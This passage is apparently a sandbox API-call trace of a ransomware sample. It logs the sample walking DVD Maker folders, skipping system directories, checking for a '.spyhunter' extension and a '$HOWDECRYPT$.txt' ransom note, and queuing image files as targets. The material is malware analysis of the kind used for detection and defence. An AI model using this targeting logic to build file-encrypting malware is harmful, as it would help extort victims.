lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0093.176] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.176] lstrlenW (lpString="Windows") returned 7 [0093.176] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.177] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.177] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.177] lstrlenW (lpString="System Volume Information") returned 25 [0093.177] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\.") returned 58 [0093.177] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.177] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.177] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.177] lstrlenW (lpString="Windows") returned 7 [0093.177] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.177] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.177] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.177] lstrlenW (lpString="System Volume Information") returned 25 [0093.177] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\..") returned 59 [0093.177] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.177] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.177] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.178] lstrcmpiW (lpString1="1047x576black.png", lpString2="Windows") returned -1 [0093.178] lstrlenW (lpString="Windows") returned 7 [0093.178] lstrcmpiW (lpString1="1047x576black.png", lpString2="$Recycle.bin") returned 1 [0093.178] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.178] lstrcmpiW (lpString1="1047x576black.png", lpString2="System Volume Information") returned -1 [0093.178] lstrlenW (lpString="System Volume Information") returned 25 [0093.178] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576black.png") returned 74 [0093.178] StrStrIW (lpFirst="1047x576black.png", lpSrch=".spyhunter") returned 0x0 [0093.178] lstrcmpW (lpString1="1047x576black.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.178] lstrcmpW (lpString1="1047x576black.png", lpString2="_uninstalling_.png") returned 1 [0093.178] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576black.png") returned 74 [0093.178] GetProcessHeap () returned 0x2c0000 [0093.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd6) returned 0x346648 [0093.178] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15f8) returned 0x2c310e0 [0093.178] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.178] lstrcmpiW (lpString1="1047x576_91n92.png", lpString2="Windows") returned -1 [0093.178] lstrlenW (lpString="Windows") returned 7 [0093.178] lstrcmpiW (lpString1="1047x576_91n92.png", lpString2="$Recycle.bin") returned 1 [0093.178] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.178] lstrcmpiW (lpString1="1047x576_91n92.png", lpString2="System Volume Information") returned -1 [0093.178] lstrlenW (lpString="System Volume Information") returned 25 [0093.178] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png") returned 75 [0093.179] StrStrIW (lpFirst="1047x576_91n92.png", lpSrch=".spyhunter") returned 0x0 [0093.179] lstrcmpW (lpString1="1047x576_91n92.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.179] lstrcmpW (lpString1="1047x576_91n92.png", lpString2="_uninstalling_.png") returned 1 [0093.179] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png") returned 75 [0093.179] GetProcessHeap () returned 0x2c0000 [0093.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x346808 [0093.179] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1600) returned 0x2c310e0 [0093.179] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.179] lstrcmpiW (lpString1="15x15dot.png", lpString2="Windows") returned -1 [0093.179] lstrlenW (lpString="Windows") returned 7 [0093.179] lstrcmpiW (lpString1="15x15dot.png", lpString2="$Recycle.bin") returned 1 [0093.179] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.179] lstrcmpiW (lpString1="15x15dot.png", lpString2="System Volume Information") returned -1 [0093.179] lstrlenW (lpString="System Volume Information") returned 25 [0093.179] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png") returned 69 [0093.179] StrStrIW (lpFirst="15x15dot.png", lpSrch=".spyhunter") returned 0x0 [0093.179] lstrcmpW (lpString1="15x15dot.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.179] lstrcmpW (lpString1="15x15dot.png", lpString2="_uninstalling_.png") returned 1 [0093.179] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png") returned 69 [0093.179] GetProcessHeap () returned 0x2c0000 [0093.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xcc) returned 0x37e3b0 [0093.179] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1608) returned 0x2c310e0 [0093.180] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.180] lstrcmpiW (lpString1="720x480icongraphic.png", lpString2="Windows") returned -1 [0093.180] lstrlenW (lpString="Windows") returned 7 [0093.180] lstrcmpiW (lpString1="720x480icongraphic.png", lpString2="$Recycle.bin") returned 1 [0093.180] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.180] lstrcmpiW (lpString1="720x480icongraphic.png", lpString2="System Volume Information") returned -1 [0093.180] lstrlenW (lpString="System Volume Information") returned 25 [0093.180] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png") returned 79 [0093.180] StrStrIW (lpFirst="720x480icongraphic.png", lpSrch=".spyhunter") returned 0x0 [0093.180] lstrcmpW (lpString1="720x480icongraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.180] lstrcmpW (lpString1="720x480icongraphic.png", lpString2="_uninstalling_.png") returned 1 [0093.180] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png") returned 79 [0093.180] GetProcessHeap () returned 0x2c0000 [0093.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x377ff0 [0093.180] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1610) returned 0x2c310e0 [0093.180] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.180] lstrcmpiW (lpString1="720_480shadow.png", lpString2="Windows") returned -1 [0093.180] lstrlenW (lpString="Windows") returned 7 [0093.180] lstrcmpiW (lpString1="720_480shadow.png", lpString2="$Recycle.bin") returned 1 [0093.180] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.181] lstrcmpiW (lpString1="720_480shadow.png", lpString2="System Volume Information") returned -1 [0093.181] lstrlenW (lpString="System Volume Information") returned 25 [0093.181] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png") returned 74 [0093.181] StrStrIW (lpFirst="720_480shadow.png", lpSrch=".spyhunter") returned 0x0 [0093.181] lstrcmpW (lpString1="720_480shadow.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.181] lstrcmpW (lpString1="720_480shadow.png", lpString2="_uninstalling_.png") returned 1 [0093.181] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png") returned 74 [0093.181] GetProcessHeap () returned 0x2c0000 [0093.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd6) returned 0x3469c8 [0093.181] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1618) returned 0x2c310e0 [0093.181] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.181] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="Windows") returned -1 [0093.181] lstrlenW (lpString="Windows") returned 7 [0093.182] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="$Recycle.bin") returned 1 [0093.182] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.182] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="System Volume Information") returned -1 [0093.182] lstrlenW (lpString="System Volume Information") returned 25 [0093.182] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png") returned 89 [0093.182] StrStrIW (lpFirst="NavigationLeft_ButtonGraphic.png", lpSrch=".spyhunter") returned 0x0 [0093.182] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.182] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0093.182] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png") returned 89 [0093.182] GetProcessHeap () returned 0x2c0000 [0093.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf4) returned 0x35a660 [0093.182] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1620) returned 0x2c310e0 [0093.182] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.182] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="Windows") returned -1 [0093.182] lstrlenW (lpString="Windows") returned 7 [0093.182] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="$Recycle.bin") returned 1 [0093.182] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.182] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="System Volume Information") returned -1 [0093.182] lstrlenW (lpString="System Volume Information") returned 25 [0093.182] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png") returned 95 [0093.182] StrStrIW (lpFirst="NavigationLeft_SelectionSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0093.182] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.183] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0093.183] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png") returned 95 [0093.183] GetProcessHeap () returned 0x2c0000 [0093.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x100) returned 0x381ca0 [0093.183] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1628) returned 0x2c310e0 [0093.183] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.183] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="Windows") returned -1 [0093.183] lstrlenW (lpString="Windows") returned 7 [0093.183] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="$Recycle.bin") returned 1 [0093.183] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.183] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="System Volume Information") returned -1 [0093.183] lstrlenW (lpString="System Volume Information") returned 25 [0093.183] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png") returned 90 [0093.183] StrStrIW (lpFirst="NavigationRight_ButtonGraphic.png", lpSrch=".spyhunter") returned 0x0 [0093.183] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.183] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0093.183] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_ButtonGraphic.png") returned 90 [0093.183] GetProcessHeap () returned 0x2c0000 [0093.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf6) returned 0x35a760 [0093.183] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1630) returned 0x2c310e0 [0093.183] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.183] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="Windows") returned -1 [0093.183] lstrlenW (lpString="Windows") returned 7 [0093.184] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="$Recycle.bin") returned 1 [0093.184] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.184] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="System Volume Information") returned -1 [0093.184] lstrlenW (lpString="System Volume Information") returned 25 [0093.184] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png") returned 96 [0093.184] StrStrIW (lpFirst="NavigationRight_SelectionSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0093.184] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.184] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0093.184] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationRight_SelectionSubpicture.png") returned 96 [0093.184] GetProcessHeap () returned 0x2c0000 [0093.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x102) returned 0x3508c0 [0093.184] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1638) returned 0x2c310e0 [0093.184] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.184] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="Windows") returned -1 [0093.184] lstrlenW (lpString="Windows") returned 7 [0093.184] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="$Recycle.bin") returned 1 [0093.184] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.184] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="System Volume Information") returned -1 [0093.184] lstrlenW (lpString="System Volume Information") returned 25 [0093.184] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png") returned 87 [0093.184] StrStrIW (lpFirst="NavigationUp_ButtonGraphic.png", lpSrch=".spyhunter") returned 0x0 [0093.184] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.184] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0093.185] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_ButtonGraphic.png") returned 87 [0093.185] GetProcessHeap () returned 0x2c0000 [0093.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf0) returned 0x355980 [0093.185] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1640) returned 0x2c310e0 [0093.185] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.185] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="Windows") returned -1 [0093.185] lstrlenW (lpString="Windows") returned 7 [0093.185] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="$Recycle.bin") returned 1 [0093.185] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.185] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="System Volume Information") returned -1 [0093.185] lstrlenW (lpString="System Volume Information") returned 25 [0093.185] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png") returned 93 [0093.185] StrStrIW (lpFirst="NavigationUp_SelectionSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0093.185] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.185] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0093.185] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationUp_SelectionSubpicture.png") returned 93 [0093.185] GetProcessHeap () returned 0x2c0000 [0093.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xfc) returned 0x381da8 [0093.185] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1648) returned 0x2c310e0 [0093.185] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.185] lstrcmpiW (lpString1="photograph.png", lpString2="Windows") returned -1 [0093.185] lstrlenW (lpString="Windows") returned 7 [0093.186] lstrcmpiW (lpString1="photograph.png", lpString2="$Recycle.bin") returned 1 [0093.186] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.186] lstrcmpiW (lpString1="photograph.png", lpString2="System Volume Information") returned -1 [0093.186] lstrlenW (lpString="System Volume Information") returned 25 [0093.186] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png") returned 71 [0093.186] StrStrIW (lpFirst="photograph.png", lpSrch=".spyhunter") returned 0x0 [0093.186] lstrcmpW (lpString1="photograph.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.186] lstrcmpW (lpString1="photograph.png", lpString2="_uninstalling_.png") returned 1 [0093.186] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\photograph.png") returned 71 [0093.186] GetProcessHeap () returned 0x2c0000 [0093.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x37e7e8 [0093.186] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1650) returned 0x2c310e0 [0093.186] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0093.186] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0093.187] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\$HOWDECRYPT$.txt") returned 73 [0093.187] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\$HOWDECRYPT$.txt") returned 73 [0093.187] GetProcessHeap () returned 0x2c0000 [0093.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd4) returned 0x346c68 [0093.187] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1658) returned 0x2c310e0 [0093.187] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0093.187] lstrcmpiW (lpString1="Travel", lpString2="Windows") returned -1 [0093.187] lstrlenW (lpString="Windows") returned 7 [0093.187] lstrcmpiW (lpString1="Travel", lpString2="$Recycle.bin") returned 1 [0093.188] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.188] lstrcmpiW (lpString1="Travel", lpString2="System Volume Information") returned 1 [0093.188] lstrlenW (lpString="System Volume Information") returned 25 [0093.188] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel") returned 54 [0093.188] lstrcmpW (lpString1="Travel", lpString2=".") returned 1 [0093.188] lstrcmpW (lpString1="Travel", lpString2="..") returned 1 [0093.188] GetProcessHeap () returned 0x2c0000 [0093.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c11050 [0093.188] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\*") returned 56 [0093.188] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0093.278] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.278] lstrlenW (lpString="Windows") returned 7 [0093.278] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.278] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.278] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.278] lstrlenW (lpString="System Volume Information") returned 25 [0093.278] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\.") returned 56 [0093.278] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.278] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.278] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.278] lstrlenW (lpString="Windows") returned 7 [0093.278] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.278] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.278] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.278] lstrlenW (lpString="System Volume Information") returned 25 [0093.278] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\..") returned 57 [0093.278] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.278] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.278] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.278] lstrcmpiW (lpString1="16_9-frame-background.png", lpString2="Windows") returned -1 [0093.278] lstrlenW (lpString="Windows") returned 7 [0093.279] lstrcmpiW (lpString1="16_9-frame-background.png", lpString2="$Recycle.bin") returned 1 [0093.279] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.279] lstrcmpiW (lpString1="16_9-frame-background.png", lpString2="System Volume Information") returned -1 [0093.279] lstrlenW (lpString="System Volume Information") returned 25 [0093.279] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-background.png") returned 80 [0093.279] StrStrIW (lpFirst="16_9-frame-background.png", lpSrch=".spyhunter") returned 0x0 [0093.279] lstrcmpW (lpString1="16_9-frame-background.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.279] lstrcmpW (lpString1="16_9-frame-background.png", lpString2="_uninstalling_.png") returned 1 [0093.279] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-background.png") returned 80 [0093.279] GetProcessHeap () returned 0x2c0000 [0093.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x34f238 [0093.279] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1530) returned 0x2c310e0 [0093.279] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.279] lstrcmpiW (lpString1="16_9-frame-highlight.png", lpString2="Windows") returned -1 [0093.279] lstrlenW (lpString="Windows") returned 7 [0093.279] lstrcmpiW (lpString1="16_9-frame-highlight.png", lpString2="$Recycle.bin") returned 1 [0093.279] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.279] lstrcmpiW (lpString1="16_9-frame-highlight.png", lpString2="System Volume Information") returned -1 [0093.279] lstrlenW (lpString="System Volume Information") returned 25 [0093.279] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-highlight.png") returned 79 [0093.279] StrStrIW (lpFirst="16_9-frame-highlight.png", lpSrch=".spyhunter") returned 0x0 [0093.279] lstrcmpW (lpString1="16_9-frame-highlight.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.279] lstrcmpW (lpString1="16_9-frame-highlight.png", lpString2="_uninstalling_.png") returned 1 [0093.279] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-highlight.png") returned 79 [0093.280] GetProcessHeap () returned 0x2c0000 [0093.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x377f08 [0093.280] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1538) returned 0x2c310e0 [0093.280] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.280] lstrcmpiW (lpString1="16_9-frame-image-inset.png", lpString2="Windows") returned -1 [0093.280] lstrlenW (lpString="Windows") returned 7 [0093.280] lstrcmpiW (lpString1="16_9-frame-image-inset.png", lpString2="$Recycle.bin") returned 1 [0093.280] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.280] lstrcmpiW (lpString1="16_9-frame-image-inset.png", lpString2="System Volume Information") returned -1 [0093.280] lstrlenW (lpString="System Volume Information") returned 25 [0093.280] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-image-inset.png") returned 81 [0093.280] StrStrIW (lpFirst="16_9-frame-image-inset.png", lpSrch=".spyhunter") returned 0x0 [0093.280] lstrcmpW (lpString1="16_9-frame-image-inset.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.280] lstrcmpW (lpString1="16_9-frame-image-inset.png", lpString2="_uninstalling_.png") returned 1 [0093.280] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-image-inset.png") returned 81 [0093.280] GetProcessHeap () returned 0x2c0000 [0093.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x34ee78 